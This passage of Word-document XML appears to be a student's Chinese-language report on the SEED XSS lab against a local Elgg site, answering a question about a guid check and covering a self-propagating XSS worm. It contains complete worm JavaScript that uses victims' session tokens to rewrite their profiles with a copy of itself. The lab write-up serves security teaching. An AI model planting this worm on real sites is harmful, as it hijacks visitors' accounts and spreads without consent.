        </w:rPr>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> my hero</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3138F0CD" w14:textId="4CF05D2E" w:rsidR="002C74D4" w:rsidRDefault="002C74D4" w:rsidP="00D773D3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FB6195C" wp14:editId="07F7EA9E">
            <wp:extent cx="4705350" cy="2343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86E0" w14:textId="48946B4E" w:rsidR="002C74D4" w:rsidRDefault="002C74D4" w:rsidP="00D773D3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002C74D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41FA19BA" wp14:editId="32B9CF89">
            <wp:extent cx="4933950" cy="2019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E6D" w14:textId="7A747185" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00D773D3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入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主页面，P</w:t>
      </w:r>
      <w:r>
        <w:t>OST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求被发送，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的信息成功被修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9256AD" w14:textId="6033FE24" w:rsidR="002C74D4" w:rsidRDefault="002C74D4" w:rsidP="00D773D3">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C74D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6578E40A" wp14:editId="69D14898">
            <wp:extent cx="1895475" cy="24574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4D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C74D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48BF7D7F" wp14:editId="753E5803">
            <wp:extent cx="4714875" cy="23431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8A9D" w14:textId="3953B961" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE3ACA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question 3: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3ACA">
        <w:t xml:space="preserve">Why do we need Line </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3ACA">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>➀</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3ACA">
        <w:t>? Remove this line, and repeat your attack. Report and explain your observation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DAC897" w14:textId="59F9D80C" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE3ACA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要添加的内容是要判断</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE3ACA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE3ACA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE3ACA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3ACA">
        <w:t>amy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE3ACA">
        <w:t>本人的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE3ACA">
        <w:t>guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE3ACA">
        <w:t>，不是才能修改，反之</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE3ACA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3ACA">
        <w:t>amy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE3ACA">
        <w:t>在执行完profile界面后就会在自己的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3ACA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3ACA">
        <w:t>bout me里显示“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE3ACA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3ACA">
        <w:t>amy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE3ACA">
        <w:t xml:space="preserve"> is my hero”</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3ACA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，从而覆盖了脚本。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则其他人在访问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主页后就不会被修改自己的profile，也就不会显示“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is my hero</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E21DE6" w14:textId="5DA1DCB7" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259D425B" w14:textId="4A4D2D8D" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3ACA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 6: Writing a Self-Propagating XSS Worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD95CAF" w14:textId="4AE9A7DA" w:rsidR="00031C0C" w:rsidRPr="00681EC5" w:rsidRDefault="00031C0C" w:rsidP="00681EC5">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00681EC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B09FA8" w14:textId="3FAC431F" w:rsidR="00681EC5" w:rsidRPr="00EE3ACA" w:rsidRDefault="00681EC5" w:rsidP="00681EC5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先写入以下脚本在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“About</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>me”中（以明文方式）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D055B" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script type="text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" id="worm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E435490" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk51145104"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>window.onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781016B7" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>headerTag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "&lt;script id=\"worm\"type=\"text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\"&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4454CE" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jsCode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worm").</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04763317" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tailTag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "&lt;/" + "script&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45929B13" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wormCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encodeURIComponent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>headerTag+jsCode+tailTag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2453F7B4" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>//and Security Token __</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elgg_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44527906" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=elgg.session.user.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF9C3B5" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elgg.session.user.guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD5B924" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>var desc ="&amp;description=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is my hero"+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wormCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042C7160" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>desc+="&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accesslevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[description]=2";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38061471" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="&amp;__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elgg_ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="+elgg.security.token.__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elgg_ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4AFF1A" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>var token="&amp;__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elgg_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="+elgg.security.token.__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elgg_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4429704C" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">//Construct the content of your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C5E403" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sendurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="http://www.xsslabelgg.com/action/profile/edit";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C8F6BF" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>var content=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>token+ts+userName+desc+guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; //FILL IN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AEC4F1" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elgg.session.user.guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>!=47)  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C63D4D" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>//Create and send Ajax request to modify profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152A6E18" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>var Ajax=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CE4E43" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ajax=new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D1503" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ajax.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("POST",</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sendurl,true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053C0888" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ajax.setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("Content-Type",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B200738" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>"application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1E9ED" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ajax.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1838093C" w14:textId="77777777" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>} }</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="5BFB9D65" w14:textId="4E97DCC5" w:rsidR="00EE3ACA" w:rsidRDefault="00EE3ACA" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FD499C" w14:textId="72007655" w:rsidR="00681EC5" w:rsidRDefault="00681EC5" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录Alice的账号进入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主页，再看Alice的profile发现信息被修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289AF861" w14:textId="16C897B6" w:rsidR="00031C0C" w:rsidRDefault="00031C0C" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A58137F" wp14:editId="2FF0C36F">
            <wp:extent cx="4829175" cy="21050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EC46" w14:textId="76B31D37" w:rsidR="00681EC5" w:rsidRDefault="00681EC5" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的账号进入Alice主页，再看</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己的profile，发现自己的信息被修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E4F41" w14:textId="5074B43A" w:rsidR="00031C0C" w:rsidRDefault="00031C0C" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00031C0C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DDA630E" wp14:editId="0E16CC7B">
            <wp:extent cx="4886325" cy="25717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E89E" w14:textId="0A4F61BB" w:rsidR="00681EC5" w:rsidRDefault="00681EC5" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的明文显示如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F40A1ED" w14:textId="1DF1743E" w:rsidR="00031C0C" w:rsidRDefault="00031C0C" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00031C0C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B68B1E3" wp14:editId="1A7D0C4A">
            <wp:extent cx="4695825" cy="24098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3375" w14:textId="7519F1CF" w:rsidR="00031C0C" w:rsidRPr="00681EC5" w:rsidRDefault="00031C0C" w:rsidP="00681EC5">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00681EC5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196FE7BD" w14:textId="1C28EA0F" w:rsidR="00681EC5" w:rsidRPr="00681EC5" w:rsidRDefault="00681EC5" w:rsidP="00681EC5">
      <w:p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主页放上如下链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDF5CB6" w14:textId="68A80662" w:rsidR="00031C0C" w:rsidRDefault="009752E6" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009752E6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BDA2979" wp14:editId="6B75C36C">
            <wp:extent cx="4943475" cy="4762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BA4" w14:textId="12D32134" w:rsidR="00681EC5" w:rsidRDefault="00681EC5" w:rsidP="00EE3ACA">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
